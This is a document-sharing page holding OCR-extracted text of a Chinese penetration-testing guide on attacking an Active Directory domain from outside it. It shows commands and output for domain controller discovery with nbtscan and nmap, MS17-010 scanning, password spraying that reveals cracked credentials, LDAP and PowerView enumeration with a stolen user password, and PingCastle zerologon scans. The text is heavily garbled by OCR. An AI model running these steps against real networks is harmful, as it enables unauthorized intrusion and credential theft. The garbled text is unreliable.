收藏
下载资源 加入VIP免费专享

2024域外渗透域内思路.docx

上传人:李司机 文档编号:7079776 上传时间:2024-06-06 格式:DOCX 页数:12 大小:79.67KB
返回 下载 相关 举报
2024域外渗透域内思路.docx_第1页
第1页 / 共12页
2024域外渗透域内思路.docx_第2页
第2页 / 共12页
2024域外渗透域内思路.docx_第3页
第3页 / 共12页
2024域外渗透域内思路.docx_第4页
第4页 / 共12页
2024域外渗透域内思路.docx_第5页
第5页 / 共12页
点击查看更多>>
资源描述

《2024域外渗透域内思路.docx》由会员分享,可在线阅读,更多相关《2024域外渗透域内思路.docx(12页珍藏版)》请在三一办公上搜索。

1、域外渗透域内方法目前我知道的方法,通过nbtscan去看那些机器是域机器,Idap定位域控,还有扫描那些机器开启了kerberos然后针对加入域内的机器去针对性的打,还有针对域控利用AS-REQ阶段去枚举用户名和密码,想问问还有其他思路么扫描探测IdaPIdaP定位域控1nm叩-T3-sV-n-sT-p389,636,3268,3269-v-open192.168.159.0/24nbtscan1nbt.exe172.16.0.0/162nbt.exe172.16.172.0/24C:MJsersAdministratorDesktopnbt.ee172.16.0.0/16172.16.0.1

2、9Workgroupwin-gdiAGlQNUi2SHARING172.16.0.36172.16.0.39WorkgrouPsERUER2003UORKGROPWIN-0F7SFlPUGB3SHARING172.16.0.44Workgroupnbt.ee172.16.172.0/24172.16.172.9UorkgrouPw1n-8ps8fucos00SHARING172.16.172.13Workgroupxchemical-SqlrouSHARING172.16.172.15WorkgroupschemiCfi1.-REPORTSHARING1cping40.exescanosver

3、192.168.7.1192.168.7.2552cping35.exescansmbvul192.168.7.1192.168.7.255msl7010IP172.16. 0.58172.16.0.25172.16.0.39172.16.0.26172.16.0.30172.16.0.90172.16.0.20172.16. 0.121172.16.0.27172.16.0.28172.16.0.22172.16. 0.24172.16.0.23172.16.0.21172.16.0.29172.16.0.19172.16.0.170172.16.0.34172.16.0.120172.16

4、.0.44172.16. 0.2331721673RIACHe、12-34-56-78-9-BCYl12-34七6-78-9A-BCWIh-u1.AH01.04O12-34-56-78-9A-BCWIN-OF7SF1PUGB312-34-56-78-9A-BCWIN-C3Q0EFBR2II12-34-56-78-9A-BCWIN-T9三V72TDRK912-34-56-78-9A-BCdjgl12-34-56-78-9A-B-FPUN2KV5K12-34-56-78-9A-Bk-DC-02.12-34-56-78-9A-BCW.一P5HSIMJ12-34-56-78-9A-BCWIN-O1.V

5、lJPPREQQ12-34-56-78-9A-BCWlN-DGEo866A5OJ12-34-56-78-9A-BCWIN-R61NUIQDENK12-34-56-78-9A-BCWIN4J0CJI1DA3FE12-34-56-78-9A-BCWIN-OI494ORABDI12-34-56-78-9A-BCWlN-K440807GJOB12-34-56-78-9A-BCWINYDlAGIQNU1212-34-56-78-9A-BCWINDOWS-X1Q2N2H12-34-56-78-9-BCWTN-Ri3RQTTUOim12-34-56-78-9A-E.Yc-OJ12-34-56-78-9A-K

6、.CSOPBC.12-34-56-78-9A-BCWIN-73DVRBGBOA917-34-EA-7R-iA-RCWTN-MAE4PCGTI7TOSverWin(R)2008Enterprise6001SP1Win2016Standard143931Win2016Standard14393(Win2016Standard14393Win2016Standard14393Win2008R2Enterprise7601SP1r?n2。,,4393Win2012R2Standard9600“standard14393Win2016Standard14393Xin2016Standard14393Wi

7、n2016Standard14393Win2016Standard14393Win2016Standard14393Win2016Standard14393Win2008R2Standard7601SP1Win2008R2Enterprise7600e:YSe7601SP1Win2012R2Standard9600additionalinfoRimport-InodIlle.Inoke-DonainPasSwordSprayOutsIdeTheDonain.psiPSC:testInuoke-Do11ainPassuordSpra,OutsideTeDo11ain-Domain,192.168

8、.1.lDC=test,DC=com-User1.ist.user.txt-PasswordDo11ainUserl23?-UerboseI1.DAP:/192.168.1.lDC=test,DC=con*Using.user.txtasuserlisttospraywith*Warning:UserswillnotbecheckedforlockoutthreshoId.ConfirmPasswordSprayAreSFOUsureyouwanttoperformapasswordspayagainst5accounts?VVesNNo?HelpCdefaultis,V,:*Password

9、SPNayinghasbegunwith1passwords*Thisnighttakeawhiledependingonthetotalnumberofusers*NowtryingPaSSWOXdDonainUserl23?against5users.Currenttineis2:14PM*Writingsuccessesto*SUCCESS?User三testaPassword:Domai11Userl23!*SUCCESS?UserztestbPassword:DomainUsepl23?*PasswordSPrayingiscompleteIPS获取到凭证后域外获取活动目录信息的方法

10、域控制器默认会开启端口389,用作1.DAP服务httDs/3student.ithub.io%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80%E6%B4%BB%E5%8A%A8%E7%9B%AE%E5%BD%95%E4%BF%A1%E6%81%AF%E7%9A%84%E8%8E%B7%E5%8F%96Kali系统通过IdaPSearCh进行数据查询测试环境如下图前提:我们能够访问到域控制器(DC)的389端口,并且我们至少已经获得了域内f普通用户的口令这个测试环境中,我们获得了域内普通用户testa的口令为DOmainUSerI23!连接命令如下:1Idapsearc

11、h-X-HIdap:/192.168.1.1:389-DCN=testajCN=UsersjDC=testjDC=com1参数说明:23 -X进行简单认证4 -H服务器地址5 -D用来绑定服务器的DN6 -W绑定DN的密码7 -b指定要查询的根节点89这条命令会显示所能查询到的所有信息,如下图查询所有域用户1加入搜索条件:,(objectClass=user)(ObjectCategory=Person)1Idapsearch-x-HIdap:/192.168.1.1:389-DCN=testa,CN=UsersjDC=test,DC=com这条命令会输出所有域用户的所有属性,如下图msExc

12、hMDtmfMap:firstName1.astName:432584624526922538392312243159234044314233384msExchVersion:1130555651391488msEchRBACPolicy1.ink:CNDefaultRoleAssignmentPolicyrCNPolicieslCNRBAC,CN三FirstOrganizationtCN三MicrosoftExchange,CN三Services,CNConfiguration,DC三test,DC=commsExchArchiveGUID:1.XffiSHUtGGUCP4kw03+Dulw

13、=msExchArchiveStatus:1InsExchMDBRulesQuota:64InsExchMailboxAuditEnable:FA1.SEmsExchTransportRecipientSettingsRags:msEchUserAccountControl:0msExchAddressBookRags:1msExchRecipientSoftDeletedStatus:0msExchMobileMailboxRags:1InternetEncoding:0# searchreferenceref:ldap:/ForestDnsZDC=ForestDnsZones,DC=tes

14、tlDC=com# searchreferenceref:Idap:/DomainDnsZones.test.Com/DC=DomainDnsZones,DC=test,DC=com# searchreferenceref:ldap:/CN三Configuration,DC三test,DC=Com# searchresultsearch:2result:0Success# numResponses:22# numEntries:18# numReferences:3为了便于统计名称,可以选择只列出CN(COmmonName)f并且使用grep命令对输出进行过滤命令如下:1Idapsearch-

15、x-HIdap:/192.168.1.1:389-DCN=testajCN=UsersjDC=testjDC=com查询所有计算机加入搜索条件:(&(ObjeCtCategOry=COnIPUter)(ObjeCtCIaSS=COmPUter)命令如下:1Id叩SearCh-x-HIdap:/192.168.1.1:389-D,CN=testa,CN=UsersjDC=test,DC=com查询所有组加入搜索条件:”(&(ObjeCtCategory=group)”命令如下:1Idapsearch-HIdap:/192.168.1.1:389-DCN=testa,CN=UsersjDC=tes

16、t,DC=com接着,开始带账密此处只需一个普通用户账密即可远程dump域内数据,实际中亦可把IdaPdOmaindUmP挂至Usocks下使用,dump的速度跟数据量有直接关系#pip2.7installIdapdomaindump#Idapdomaindump192.168.159.149-u,motoomajun,-pmjl23!#45-atNT1.M2.Windows系统通过POWerVieW进行数据查询前提:我们能够访问到域控制器(De)的389端口,并且我们至少已经获得了域内一个普通用户的口令这个测试环境中,我们获得了域内普通用户testa的口令为DOmainUSerI23!Pow

17、erView的地址:https:/github.COnPowerShe1IMafia/PowerSpIOit/b1ob/masterReCOn/PowerView.PS查询所有域用户这里需要使用凭据信息,所以完整的命令如下:1工mport-Module.PowerView.ps!1$uname=testa2$PWd=COnVertTo-SeCUreString,DomainUserl23!,-AsPlainText-Force3$cPed=New-ObjectSystem.Management.Automation.PSCredential($uname,$PWd)4Get-NetUser-D

18、-DomainController192.168.1.1-ADSpath1.DAP:/1Get-NetUser-D-DomainController172.16.172.80-ADSpath为了便于统计名称,可以选择只列出name项,完整命令如下:1$iJname=testa”2$pwd=ConvertTo-SecureStringDomainUserl23!-AsPlainText-Force3$cPed=New-ObjectSystem.Management.Automation.PSCredential($uname,$PWd)4Get-NetUser-D-DomainControlle

19、r192.168.1.1-ADSpath1.DAP:/PSC:testGet-NetUser-Domaintest.con-DonainControHer192.168.1.1-ADSpathF1.DAP:/DC=test,DC=com-Credential$credF1namename:Administratorname:Guestname:krbtgtname:testlname:test2name:testaname:testbname:exchangeuseriname:ExchangeOnline-ApplicationAccountname:Syste11Mailboname:Sy

20、stenMailboname:SystenMailboname:DiscouerirSearchMailboxname:Migration.8F3e7716-2011-43e4-96bl-aba62d229136name:FederatedEnail.4clf4d8b-8179-4148-93bf-00a95fale042name:HealthMailboe822fbac72084940803a35e251188c0bnane:HealthMailbobd63ca8052dl46bl92ce9b50ec6f6a9enane:HealtMailboad21f9e862eb4a90a3d28efd

21、bea71641查询所有计算机1$uname=testa2$PWd=COnVertTO-SecUreStringDomainUserl23!-AsPlainText-Force3$cred=New-ObjectSystem.Management.Automation.PSCredential($uname,$pwd)4Get-NetComputer-D-DomainController192.168.1.1-ADSpath1.DA查询所有组1$iIname=testa2$PWd=COnVertTo-SecureStringDomainUserl23!-AsPlainText-Force$cre

22、d=New-ObjectSystem.Management.Automation.PSCredential($uname,$pwd)4Get-NetGroup-D-DomainController192.168.1.1-ADSpath1.DAP:/PingCastIehttps:i搜集域控列表包括各个域控机器自身的详细信息2搜集域管列表包括各个域管用户的活跃记录,锁定状态等3搜集域内组列表4自动检查域间信任关系5 检查容易受kerberoast攻击的域管账户6 检查是否安装有laps7检查域内用户密码策略8 口检查AdminSDHolder后门9口检查金票后门10 口检查GPO后门11 口检查

23、WFF12 口检查域内登录脚本13 检查委派14 口检查容易受攻击的老版本系统15 口检查容易受AS-REPRoasting攻击的账户16 域功能级别17 口僵尸账户识别18 密码长期有效的用户19 口域内所用操作系统版本大致画像20 zerologon漏洞探测日常域外搜集基本就一句话,其余的都用不上,因为都已经概括进去了,实际中亦可直接把工具挂到SOCkS下操作一句话域内搜集1PingCastle.exe-server192.168.159.149-usermotoomajun-passwordmjl23!2此处的域用户登录记录获取的并不太全PingCastle.exe-server192.

24、168.159.149-usermotoomajun-passwordmjl23!1更多该命令参数:2-healthcheck:执行安全检查(步骤1)-api-endpoint:通过调用api上传报告,例如:http:/server-api-keykey:使用已注册的api密钥-explore-trust:在运行安全检查之后,在目录林的域上,对除目录林和目录林信任域之-explore-forest-trust:在森林的根域上,运行状况检查之后,对发现的所有森林信任explore-trust和explore-forest-trust可起运彳亍-explore-exceptiondomains:逗

25、号分隔的不会自动探索的域的值-encrypt:使用存储在.config文件中的RSA密钥对Xml报告的内容进行加密-level级别:指定在Xml文件中找到的数据量例如:-levelFull,Normal,1.igh11-no-enum-limit:删除HTM1.报告中最多100个用户的限制12-reachable:将可访问域添加到发现的域列表中-SendXmlTo电子邮件:将Xml报告发送到邮箱(以逗号分隔的电子邮件)-SendHtmlTo电子邮件:将html报告发送到邮箱15-SendAllTo电子邮件:将html报告发送到邮箱16-notifyMail电子邮件:在收到邮件时添加电子邮件通知

26、-Smtplogin用户:允许SmtP凭据.-smtppasspass:在命令行中输入-smtptls:如果在465和587以外的其他端口上使用,则在SMTP中启用T1.S/SS1.20-skip-null-session:不测试空会话-webdirectorydir:将XmI报告上传到WebdaV服务器-webuser用户:可选的用户名和密码-webpassword密码2425-I-swear-I-paid-win7-support:毫无意义-scanner1警告:同时检查多个工作站可能会引发安全警报。2aclcheck检查域内的AC1.34antivirus检查域内未安装已知防病毒软件的计

27、算机,它用于检测不受保护的计56export_user导出AD域内所有用户及其创建日期,上次登录和上次密码更改。789foreignusers使用信任机制枚举位于其他域中的用户,例如距离太远的域1011laps_bitlocker1213Iocaladmin1415nullsession1617nullsession-trust1819Oxidbindings检查是否为域中的所有计算机启用1.APS(本地管理员密码解决枚举计算机的本地管理员检查是否启用了空会话并提供示例。检查可以通过空会话进行通信的域信任列表2021remote2223share2425smb26通过OXidResolver(

28、DeOM的一部分)列出计算机的所有工PC无检查计算机上是否安装了远程桌面解决方案列出计算机上的共享列表,并显示不同的共享是否可以由所有人访问扫描计算机可用的Smb版本并显示Srnb协议是否启动27smb3querynetwork使用SMB3协议列出计算机所对应的和接口速度。需要身份验28spooler检查域内各个主机上是否开放了打印机服务2930startup获取计算机的上次启动日期。可用于确定是否已应用最新补丁3132zerologon检验是否存在Zero1.ogon漏洞。注意:必须在域内测试。域信任zerologon漏洞探测,注,此操作需要在目标域内机器上进行1PingCastle.exe-server192.168.159.149-scannerzerologon-scmode-dc目标系统无met3.5环境,可尝试直接在cmd命令行下在线安装1DISM/Online/Enable-Feature/FeatureName:NetFx3/AllApacheDirectoryStudio直接用域账号连上去即可(实际中亦可直接挂在socks下操作),非常完善

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 生活休闲 > 在线阅读


备案号:宁ICP备20000045号-2

经营许可证:宁B2-20210002

宁公网安备 64010402000987号